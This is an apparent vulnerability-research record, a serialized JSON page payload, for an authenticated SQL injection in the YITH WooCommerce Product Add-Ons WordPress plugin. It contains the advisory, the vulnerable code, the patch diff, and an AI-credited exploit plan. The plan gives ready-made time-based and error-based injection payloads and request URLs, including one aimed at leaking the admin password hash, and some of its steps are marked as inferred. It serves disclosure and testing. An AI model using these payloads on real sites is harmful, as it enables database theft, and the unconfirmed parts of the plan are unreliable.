[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fl8MhGX5WbPT0xFgSnUdQXolxwrsUK72DSCre2Tqr_wQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-42383","yith-woocommerce-product-add-ons-authenticated-shop-manager-sql-injection","YITH WooCommerce Product Add-Ons \u003C= 4.29.0 - Authenticated (Shop manager+) SQL Injection","The YITH WooCommerce Product Add-Ons plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 4.29.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with shop manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","yith-woocommerce-product-add-ons",null,"\u003C=4.29.0","4.29.1","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-20 00:00:00","2026-05-26 19:16:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe1531898-c6f6-4841-a03b-bbcd841b76cc?source=api-prod",7,[22,23,24,25],"includes\u002Fclass-yith-wapo-db.php","init.php","languages\u002Fyith-woocommerce-product-add-ons.pot","readme.txt","researched",false,3,"This research plan outlines the steps required to demonstrate a SQL Injection vulnerability in the YITH WooCommerce Product Add-Ons plugin.\n\n### 1. Vulnerability Summary\nThe `YITH_WAPO_DB::yith_wapo_get_blocks` function in `includes\u002Fclass-yith-wapo-db.php` is vulnerable to SQL Injection. The function constructs a SQL query by directly concatenating values from the `$query_args` array into the `LIMIT`, `OFFSET`, and `WHERE` clauses of a query. Specifically, the `limit` and `offset` parameters are used without any sanitization or casting to integers, and keys within the search conditions are not properly prepared using `$wpdb->prepare()`.\n\nThis allows an authenticated attacker with Shop Manager or Administrator privileges to append arbitrary SQL commands, potentially leading to the extraction of sensitive data (like user hashes) from the WordPress database.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Admin Dashboard.\n*   **Vulnerable Action:** Accessing the list of Product Add-on \"Blocks\".\n*   **Vulnerable Parameter:** `limit` (concatenated to the `LIMIT` clause) or `s` (search parameter used in the `WHERE` clause).\n*   **Authentication Required:** Authenticated user with the `shop_manager` or `administrator` capability.\n*   **Preconditions:** The plugin must be active. At least one \"Block\" should ideally exist, though the injection is effective regardless.\n\n### 3. Code Flow\n1.  **Entry Point:** An administrator navigates to the \"Blocks\" management page. This is likely handled by the `YITH_WAPO_Admin` class which initializes a `YITH_WAPO_Blocks_List_Table`.\n2.  **Logic:** The list table's `prepare_items()` method (or equivalent) fetches data by calling `YITH_WAPO_DB::get_instance()->yith_wapo_get_blocks( false, $args )`.\n3.  **Vulnerable Sink:** Inside `yith_wapo_get_blocks` in `includes\u002Fclass-yith-wapo-db.php`:\n    *   `$conditions` is derived from `$query_args`.\n    *   If `isset( $conditions['limit'] )`, the code performs: `$query_limit = 'LIMIT ' . $conditions['limit'];`.\n    *   The resulting `$query_limit` is concatenated directly into the final query string:\n        `$query = \"SELECT id FROM {$blocks_table} {$query_where} ORDER BY {$order_by} ASC {$query_limit} {$query_offset}\";`\n    *   The query is executed via `$wpdb->get_col( $query )`, which explicitly ignores `WordPress.DB.PreparedSQL.NotPrepared`.\n\n### 4. Nonce Acquisition Strategy\nWhile many admin list tables use nonces for bulk actions, simple `GET`-based filtering and searching often do not enforce a nonce check for the data retrieval itself. \n\nIf the blocks list is loaded via an AJAX request (common in YITH plugins), the nonce can be retrieved using the following steps:\n1.  **Identify Shortcode\u002FPage:** The blocks list is in the admin panel at `admin.php?page=yith_wapo_blocks` (inferred slug based on `YITH_WAPO_SLUG`).\n2.  **Navigation:** Navigate to the Add-ons Blocks page using `browser_navigate`.\n3.  **Extraction:** Use `browser_eval` to search for localized script data.\n    *   Look for the variable used in the block editor or list table. Based on common YITH patterns, this might be `yith_wapo_admin` or similar.\n    *   *Note:* If the vulnerability is triggered via a direct `GET` request to the admin page (non-AJAX), no nonce is required for the SQLi itself.\n\n### 5. Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** targeting the `limit` parameter because it is appended at the very end of the query, making it easier to manipulate.\n\n**Step-by-Step:**\n1.  **Login:** Use the `http_request` tool to authenticate as a Shop Manager.\n2.  **Baseline Request:** Request the blocks list page to confirm access:\n    `GET \u002Fwp-admin\u002Fadmin.php?page=yith_wapo_blocks`\n3.  **Exploit Request (Time-Based):**\n    Inject a `SLEEP()` command into the `limit` parameter.\n    *   **Payload:** `1; SELECT SLEEP(5)`\n    *   **URL:** `\u002Fwp-admin\u002Fadmin.php?page=yith_wapo_blocks&limit=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)`\n    *   **Alternative Payload (Search):** `\u002Fwp-admin\u002Fadmin.php?page=yith_wapo_blocks&s=test'%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20OR%20name%20LIKE%20'`\n\n**HTTP Request Details:**\n*   **Method:** `GET`\n*   **Path:** `\u002Fwp-admin\u002Fadmin.php`\n*   **Query Params:**\n    *   `page`: `yith_wapo_blocks`\n    *   `limit`: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n\n### 6. Test Data Setup\n1.  **Create Shop Manager:**\n    `wp user create attacker attacker@example.com --role=shop_manager --user_pass=password`\n2.  **Ensure Plugin is Active:**\n    `wp plugin activate yith-woocommerce-product-add-ons`\n3.  **Create a Dummy Block (Optional but helpful):**\n    The vulnerability exists even if no blocks are returned, but having one ensures the query logic completes. (This usually requires interacting with the plugin's custom tables).\n\n### 7. Expected Results\n*   The baseline request should return in standard time (e.g., \u003C 500ms).\n*   The exploit request should result in a visible delay of approximately 5 seconds before the server responds.\n*   The response body for the exploit request may be empty or a standard admin page, as the injection happens in the data-fetching layer.\n\n### 8. Verification Steps\nAfter performing the HTTP request, verify the vulnerability using the database logs or by observing the response timing.\n1.  **Check Execution Time:** Compare the `duration` field in the `http_request` response metadata.\n2.  **Database Trace (Manual):** If you have access to the environment, you can check the MySQL general log to see the malformed query:\n    `SELECT id FROM wp_yith_wapo_blocks ... LIMIT 1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n\n### 9. Alternative Approaches\nIf the `limit` parameter is not directly accepted from `$_GET`, target the `s` (search) parameter:\n*   **Search Injection:** `GET \u002Fwp-admin\u002Fadmin.php?page=yith_wapo_blocks&s=any-string' AND (SELECT 5678 FROM (SELECT(SLEEP(5)))b) AND '1'='1`\n*   **Error-Based (if `WP_DEBUG` is on):**\n    `limit=1 PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user_pass FROM wp_users LIMIT 1))),1)`\n    This would attempt to leak the admin password hash directly into an error message.","The YITH WooCommerce Product Add-Ons plugin for WordPress is vulnerable to SQL Injection via the 'limit', 'offset', and 's' (search) parameters in the YITH_WAPO_DB class. Authenticated attackers with Shop Manager or Administrator privileges can append arbitrary SQL queries to extract sensitive database information using time-based blind injection techniques.","\u002F\u002F includes\u002Fclass-yith-wapo-db.php line 92\n            if ( isset( $conditions['limit'] ) ) {\n                $query_limit = 'LIMIT ' . $conditions['limit'];\n                unset( $conditions['limit'] );\n            }\n\n            \u002F\u002F Offset.\n            if ( isset( $conditions['offset'] ) ) {\n                $query_offset = 'OFFSET ' . $conditions['offset'];\n                unset( $conditions['offset'] );\n            }\n\n\u002F\u002F ... lines 128-130\n\t\t\t$query   = \"SELECT id FROM {$blocks_table} {$query_where} ORDER BY {$order_by} ASC {$query_limit} {$query_offset}\";\n\n\t\t\treturn $wpdb->get_col( $query ); \u002F\u002F phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared\n\n---\n\n\u002F\u002F includes\u002Fclass-yith-wapo-db.php line 211\n            \u002F\u002F Search box.\n            if ( isset( $query_args['s'] ) ) {\n                if ( ! empty( $query_args['s'] ) ){\n                    $query_search = \"( name LIKE '%\" . $query_args['s'] . \"%' ) \n                AND \";\n                }\n            }","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyith-woocommerce-product-add-ons\u002F4.29.0\u002Fincludes\u002Fclass-yith-wapo-db.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyith-woocommerce-product-add-ons\u002F4.29.1\u002Fincludes\u002Fclass-yith-wapo-db.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyith-woocommerce-product-add-ons\u002F4.29.0\u002Fincludes\u002Fclass-yith-wapo-db.php\t2024-09-11 12:02:46.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyith-woocommerce-product-add-ons\u002F4.29.1\u002Fincludes\u002Fclass-yith-wapo-db.php\t2026-04-22 09:49:24.000000000 +0000\n@@ -219,11 +219,12 @@\n             }\n \n             \u002F\u002F Search box.\n-            if ( isset( $query_args['s'] ) ) {\n-                if ( ! empty( $query_args['s'] ) ){\n-                    $query_search = \"( name LIKE '%\" . $query_args['s'] . \"%' ) \n-                AND \";\n-                }\n+            if ( isset( $query_args['s'] ) && ! empty( $query_args['s'] ) ) {\n+\n+                global $wpdb;\n+\n+                $search = esc_sql( $wpdb->esc_like( $query_args['s'] ) );\n+                $query_search = \"( name LIKE '%{$search}%' ) AND \";\n             }\n \n             $product_id = $product->get_id();","The exploit targets the blocks management administrative page by manipulating parameters passed to database retrieval functions. \n\n1. **Authentication**: The attacker must be logged in with a user account possessing `shop_manager` or `administrator` capabilities.\n2. **Endpoint**: A GET request is made to `\u002Fwp-admin\u002Fadmin.php?page=yith_wapo_blocks`.\n3. **Payload Construction**: The attacker appends a malicious SQL payload to either the `limit` or `s` (search) parameters. A typical payload for the `limit` parameter uses a time-based technique: `1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)`.\n4. **Execution**: When the plugin attempts to fetch the list of add-on blocks, it concatenates the unsanitized parameter directly into the SQL query and executes it. \n5. **Verification**: The success of the injection is confirmed by observing a significant delay (e.g., 5 seconds) in the server response time.","gemini-3-flash-preview","2026-06-04 22:47:34","2026-06-04 22:48:12",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","4.29.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyith-woocommerce-product-add-ons\u002Ftags\u002F4.29.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyith-woocommerce-product-add-ons.4.29.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyith-woocommerce-product-add-ons\u002Ftags\u002F4.29.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyith-woocommerce-product-add-ons.4.29.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyith-woocommerce-product-add-ons\u002Ftags"]